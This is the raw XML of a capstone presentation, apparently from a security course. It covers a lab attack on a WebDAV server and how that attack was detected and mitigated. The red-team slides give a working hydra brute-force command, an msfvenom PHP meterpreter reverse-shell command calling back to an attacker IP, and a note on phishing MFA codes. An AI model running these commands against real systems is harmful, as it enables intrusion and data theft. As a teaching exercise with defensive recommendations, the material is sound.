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6E6905-9136-4F78-B918-C7319CF2E080}">
  <a:tblStyle styleId="{406E6905-9136-4F78-B918-C7319CF2E0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tasks performed by th3 st00gez: Tim (4cid Burnz), Demetrio (Cr$sh 0verride), Amanda (HackerMANda), Jordan (tacosandpie), and Mike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CountZer0)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Meterpreter session successfully opened and data exfiltrated.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port scan occur?</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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Dec 11, 2020 @ 21:27.08.004</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packets were sent, and from which IP?</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~60k from 192.168.1.90</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indicates that this was a port scan? </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Sequential order of port scanning, all coming form the same date within a few seconds of each other. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk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request occur?</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20:34:26.177 </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13,611</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Flag.txt, passwd.dav </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did they contain?</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Account credentials, password hashes, connection instructions to corporate server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in the attack? 60k </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had been made before the attacker discovered the password? 7k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to this directory?</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60k request to secret folder webdav 3</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Flag.txt, passwd.dav (decoy)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IDS are set up to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> these patterns but attackers can get around the common rules by slowing down their scan rate and accessing ports out of order or spoofing their source address. This is where live </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>networking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> monitoring would come into place to stop attacks that work around the common rules from the IDS.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Integrity monitoring software can also track file access by IP’s to the system and applications and send alerts.It constantly monitors event logs, system logs, application logs, user policy enforcement, rootkit detection, file integrity, and other intrusions to the system.  If any unauthorized activity is detected, it will alert the user or block the activity or perform any other decision based on the policy that is configured on the system.</a:t>
            </a:r>
            <a:endParaRPr sz="12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There are workarounds for MFA, sometimes attackers will call the number and the person won’t think twice and tell them the MFA code that was just texted to them. You can also set up a website that records their login as well as the FA code they receive from an application and use that in order to gain access to their account. It has to be quick otherwise. Using a USB security key requires you to plug it in a USB port, even if it's left in a USB port, you still have to touch it to be authorized to login. Also account lock out features that temporarily remove versus don’t unlock without intervention should be implemented. It’s worth looking into to see if a username needs to be changed to prevent someone from brute forcing their way into an account versus a user that needs to remember their password and not ask their co workers to do it for them every day.</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b18525e91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b18525e91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Don’t let any of the pertinent files be open to the internet/hide these folders and directories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b18525e91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b18525e91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Detecting from a firewall can be difficult since the connections are made over known ports. Tuning the IDS rules for specific network segments its installed on and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> outgoing web proxies will help mitigate these types of attacks if locking down the outgoing connections and tools you can use on the server isn’t in line with the business.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b18525e91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b18525e91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 Azure instance running Windows 10 with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hypervisor acting as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> host for three VM’s with target, logs and attacker machines</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Target Machine: Capstone machine running Ubuntu Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker Machine: Kali Linux box containing all tools used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reconnaissance and attacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Logging Machine: Kibana ELK stack running on Ubuntu Linux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t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> uncovered when uploading a php payload to establish a reverse shell in the network.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t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ydra command: “hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l sets username (Ashton in this case)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-P sets what wordlist to use (in this case ‘rockyou.txt’)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-s sets the port (since the victim is a web server, we use port 80)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f exits the loop once a successful attempt is made</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-vV is very verbose which shows the username/password of every attempt that happens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Metasploit command: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php”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3.png"/><Relationship Id="rId4"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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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90.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId8"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95.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1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app.diagrams.net/?page-id=zttWSoK5y1aUIUlikZLn&amp;scale=auto#G1z8nOsA7FxL5d-K80jKR6jUjvoRNcwpaG" TargetMode="Externa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PHP Vulnerability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2015-8562</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;113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placed the PHP reverse shell on the WebDAV and activated it. This created a successful PHP reverse shell and we were able to gain access to the system and exfiltrate valuable data.</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38" name="Google Shape;1138;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;113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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1142" name="Google Shape;114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Gained access to the server, via Meterpreter session. Successfully exfiltrated data.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1147" name="Google Shape;114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8" name="Google Shape;114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1" name="Google Shape;1151;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512025" y="1678925"/>
            <a:ext cx="1961775" cy="81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64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274347" y="274938"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;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8" name="Google Shape;1158;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4" name="Google Shape;1164;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5" name="Google Shape;1165;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268363" y="789725"/>
            <a:ext cx="6607287" cy="4078149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188346" y="4624191"/>
            <a:ext cx="6767301" cy="272576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textPlain"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr b="0" i="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Comfortaa;600"/>
              </a:rPr>
              <a:t>This continues through all ports on the machine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2" name="Google Shape;1172;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3" name="Google Shape;1173;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="562450" y="724350"/>
            <a:ext cx="7255549" cy="4123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79" name="Google Shape;117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0" name="Google Shape;1180;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971400" y="686425"/>
            <a:ext cx="7095175" cy="4138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86" name="Google Shape;1186;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7" name="Google Shape;1187;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="734650" y="703075"/>
            <a:ext cx="7280324" cy="4159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3" name="Google Shape;1193;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94" name="Google Shape;1194;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00" name="Google Shape;1200;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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1360725"/>
            <a:ext cx="4060500" cy="2264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Threshold for multiple ports coming from a single origin in a short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> of time.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10 port scans in one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>minute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100 consecutive ICMP requests</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202" name="Google Shape;1202;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409838" y="1396400"/>
            <a:ext cx="4298400" cy="1496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solidFill>
                <a:srgbClr val="525252"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="525252"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Enable only the traffic internal hosts need</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Font typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Deny everything else</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158475" y="2892498"/>
            <a:ext cx="2801125" cy="189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09" name="Google Shape;120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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deny all unauthorized IPs access to shared files</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Disable directory listing</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;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Don’t use robots.txt to exclude any information, this is the first source for hackers where to look</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17" name="Google Shape;1217;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1604700"/>
            <a:ext cx="3808800" cy="29343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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>●</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert when 20+ failed login attempts in 1 minute.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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>●</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP brute force attack detector tools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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>●</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detect source IPs exceeding thresholds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Detect accounts that have 10 lockouts in a 10 minute time</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4399200" cy="31983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Using MFA for Webdav login.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Use a USB security key for Multi factor.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Lockout accounts after 3 failed attempts in 30 minutes and lock down account that requires admin intervention with 10 failed logins over 4 hours.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No root access over ssh</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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Mitigation: Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;122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Implement file server auditors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Alerts on HTTP POST and GET requests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Enable traversal signatures to security policy</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675800" y="1477475"/>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Restrict connections to the shared folder with a firewall rule.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No robots.txt files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Don’t save PII in files and have your co worker log you in every day.</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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;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4" name="Google Shape;1234;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Limit outgoing connections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Disable tools not needed to make it more difficult to establish a reverse shell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Use application aware host or client based firewalls</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1235" name="Google Shape;1235;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Limit the types of files that can be uploaded remotely.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No root ssh access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Restrict access on local machines so email attachments or unauthorized programs get installed on machines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Gateway:192.168.1.0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Hypervisor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 18.04</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a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717976" y="986675"/>
            <a:ext cx="3345471" cy="3784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{406E6905-9136-4F78-B918-C7319CF2E080}</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Windows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Hypervisor - Hosts all the VMs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 Pentesting Environment containing Metasploit and other tools to launch exploits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 Machine being attacked from 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Kibana - Log gathering utilizing Packetbeat, Filebeat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{406E6905-9136-4F78-B918-C7319CF2E080}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="4938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53550">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2012-1823</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PHP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remote attackers to execute arbitrary code by exploiting </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> in the query string.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53550">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>CVE-2015-8562</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Joomla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 remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via HTTP User-Agent header.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53550">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2012-2311</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PHP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remote attackers to execute arbitrary code. This vulnerability exists because of an incomplete fix for CVE-2012-1823.</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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
